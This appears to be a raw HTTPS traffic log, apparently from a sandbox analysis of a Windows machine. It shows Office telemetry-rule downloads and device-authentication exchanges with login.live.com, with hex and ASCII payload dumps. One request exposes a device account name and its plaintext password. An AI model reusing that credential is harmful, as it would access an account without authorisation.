                                                                                                                                                                                                        2024-12-04 12:53:59 UTC1276INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        117192.168.2.74984413.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:59 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:59 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:59 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1401
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BE055B528"
                                                                                                                                                                                                        x-ms-request-id: d3398a04-c01e-007a-0bce-45b877000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125359Z-1746fd949bd6zq92hC1EWRry4800000001a00000000008k6
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:59 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        118192.168.2.74984513.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:59 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:54:00 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:54:00 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1364
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BE1223606"
                                                                                                                                                                                                        x-ms-request-id: 4ddf438b-c01e-0049-57cd-45ac27000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125400Z-1746fd949bdwt8wrhC1EWRu6rg00000001ag0000000091zg
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:54:00 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        119192.168.2.74984613.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:54:00 UTC192OUTGET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:54:00 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:54:00 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1397
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BE7262739"
                                                                                                                                                                                                        x-ms-request-id: c8e56ad6-f01e-005d-13cc-4513ba000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125400Z-1746fd949bdjrnwqhC1EWRpg28000000016g00000000av7z
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:54:00 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        120192.168.2.74984713.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:54:00 UTC192OUTGET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:54:00 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:54:00 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1360
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BDDEB5124"
                                                                                                                                                                                                        x-ms-request-id: a14128ec-001e-005a-6ec7-45c3d0000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125400Z-1746fd949bd2cq7chC1EWRnx9g00000000t000000000a08y
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:54:00 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 6c 4d 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 6c 6c 4d 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTellMe" S="Medium" /> <F T="2">


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        121192.168.2.74984813.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:54:00 UTC192OUTGET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:54:00 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:54:00 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 1403
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BDCB4853F"
                                                                                                                                                                                                        x-ms-request-id: e40b0455-101e-008e-19d2-45cf88000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125400Z-1746fd949bdjzh7thC1EWR3g64000000018g00000000785u
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:54:00 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 34 30 31 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        122192.168.2.74984920.190.177.22443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:54:00 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Content-Type: application/soap+xml
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                        Content-Length: 3592
                                                                                                                                                                                                        Host: login.live.com
                                                                                                                                                                                                        2024-12-04 12:54:00 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                        2024-12-04 12:54:01 UTC568INHTTP/1.1 200 OK
                                                                                                                                                                                                        Cache-Control: no-store, no-cache
                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                        Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                        Expires: Wed, 04 Dec 2024 12:53:01 GMT
                                                                                                                                                                                                        P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                        x-ms-route-info: C531_SN1
                                                                                                                                                                                                        x-ms-request-id: 3ab6c6d7-7ce1-487f-ab66-4cbdd9638eed
                                                                                                                                                                                                        PPServer: PPV: 30 H: SN1PEPF0002FAA8 V: 0
                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:54:01 GMT
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 1276
                                                                                                                                                                                                        2024-12-04 12:54:01 UTC1276INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        123192.168.2.74985020.190.177.22443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:54:01 UTC446OUTPOST /ppsecure/deviceaddcredential.srf HTTP/1.0
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Content-Type: application/soap+xml
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                        Content-Length: 7642
                                                                                                                                                                                                        Host: login.live.com
                                                                                                                                                                                                        2024-12-04 12:54:01 UTC7642OUTData Raw: 3c 44 65 76 69 63 65 41 64 64 52 65 71 75 65 73 74 3e 3c 43 6c 69 65 6e 74 49 6e 66 6f 20 6e 61 6d 65 3d 22 49 44 43 52 4c 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3e 3c 42 69 6e 61 72 79 56 65 72 73 69 6f 6e 3e 32 34 3c 2f 42 69 6e 61 72 79 56 65 72 73 69 6f 6e 3e 3c 2f 43 6c 69 65 6e 74 49 6e 66 6f 3e 3c 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 3e 3c 4d 65 6d 62 65 72 6e 61 6d 65 3e 30 32 69 67 71 78 70 62 6c 70 6b 70 6c 75 63 71 3c 2f 4d 65 6d 62 65 72 6e 61 6d 65 3e 3c 50 61 73 73 77 6f 72 64 3e 2b 66 56 68 79 54 68 66 67 21 4d 2e 2b 42 2c 76 67 70 39 65 3c 2f 50 61 73 73 77 6f 72 64 3e 3c 2f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 3e 3c 4f 6c 64 4d 65 6d 62 65 72 6e 61 6d 65 3e 30 32 71 74 6c 74 6e 74 63 62 72 65 71 75 61 6a 3c 2f 4f 6c 64 4d
                                                                                                                                                                                                        Data Ascii: <DeviceAddRequest><ClientInfo name="IDCRL" version="1.0"><BinaryVersion>24</BinaryVersion></ClientInfo><Authentication><Membername>02igqxpblpkplucq</Membername><Password>+fVhyThfg!M.+B,vgp9e</Password></Authentication><OldMembername>02qtltntcbrequaj</OldM
                                                                                                                                                                                                        2024-12-04 12:54:04 UTC542INHTTP/1.1 200 OK
                                                                                                                                                                                                        Cache-Control: no-store, no-cache
                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Expires: Wed, 04 Dec 2024 12:53:01 GMT
                                                                                                                                                                                                        P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                        x-ms-route-info: C526_BAY
                                                                                                                                                                                                        x-ms-request-id: dd28ed76-824d-4e0a-8307-73facbb23a2d
                                                                                                                                                                                                        PPServer: PPV: 30 H: PH1PEPF00011EB0 V: 0
                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:54:03 GMT
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 17166
                                                                                                                                                                                                        2024-12-04 12:54:04 UTC15842INData Raw: 3c 44 65 76 69 63 65 41 64 64 52 65 73 70 6f 6e 73 65 20 53 75 63 63 65 73 73 3d 22 74 72 75 65 22 3e 3c 73 75 63 63 65 73 73 3e 74 72 75 65 3c 2f 73 75 63 63 65 73 73 3e 3c 70 75 69 64 3e 30 30 31 38 43 30 30 46 35 33 31 46 41 37 38 45 3c 2f 70 75 69 64 3e 3c 44 65 76 69 63 65 54 70 6d 4b 65 79 53 74 61 74 65 3e 33 3c 2f 44 65 76 69 63 65 54 70 6d 4b 65 79 53 74 61 74 65 3e 3c 4c 69 63 65 6e 73 65 20 43 6f 6e 74 65 6e 74 49 44 3d 22 33 32 35 32 62 32 30 63 2d 64 34 32 35 2d 34 37 31 31 2d 38 63 63 35 2d 62 32 66 35 33 63 38 33 30 62 37 36 22 20 49 44 3d 22 38 37 31 34 36 39 38 34 2d 62 61 63 38 2d 34 61 64 62 2d 61 36 36 65 2d 63 31 65 64 33 33 65 32 38 62 31 61 22 20 4c 69 63 65 6e 73 65 49 44 3d 22 33 32 35 32 62 32 30 63 2d 64 34 32 35 2d 34 37 31 31
                                                                                                                                                                                                        Data Ascii: <DeviceAddResponse Success="true"><success>true</success><puid>0018C00F531FA78E</puid><DeviceTpmKeyState>3</DeviceTpmKeyState><License ContentID="3252b20c-d425-4711-8cc5-b2f53c830b76" ID="87146984-bac8-4adb-a66e-c1ed33e28b1a" LicenseID="3252b20c-d425-4711
                                                                                                                                                                                                        2024-12-04 12:54:04 UTC1324INData Raw: 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 39 2f 78 6d 6c 64 73 69 67 23 65 6e 76 65 6c 6f 70 65 64 2d 73 69 67 6e 61 74 75 72 65 22 2f 3e 3c 2f 54 72 61 6e 73 66 6f 72 6d 73 3e 3c 44 69 67 65 73 74 4d 65 74 68 6f 64 20 41 6c 67 6f 72 69 74 68 6d 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 30 34 2f 78 6d 6c 65 6e 63 23 73 68 61 32 35 36 22 2f 3e 3c 44 69 67 65 73 74 56 61 6c 75 65 3e 67 74 71 77 70 52 35 66 47 44 61 6f 48 73 4d 37 49 57 47 4b 5a 67 61 77 58 61 30 42 50 69 47 61 65 35 62 49 75 6e 2f 52 51 4a 41 3d 3c 2f 44 69 67 65 73 74 56 61 6c 75 65 3e 3c 2f 52 65 66 65 72 65 6e 63 65 3e 3c 2f 53 69 67 6e 65 64 49 6e 66 6f 3e 3c 53 69 67 6e 61 74 75 72 65 56 61 6c 75 65 3e 41 46 38 6f 46 52 2b 47 66
                                                                                                                                                                                                        Data Ascii: tp://www.w3.org/2000/09/xmldsig#enveloped-signature"/></Transforms><DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/><DigestValue>gtqwpR5fGDaoHsM7IWGKZgawXa0BPiGae5bIun/RQJA=</DigestValue></Reference></SignedInfo><SignatureValue>AF8oFR+Gf


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        124192.168.2.74985113.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:54:01 UTC192OUTGET /rules/rule700400v2s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
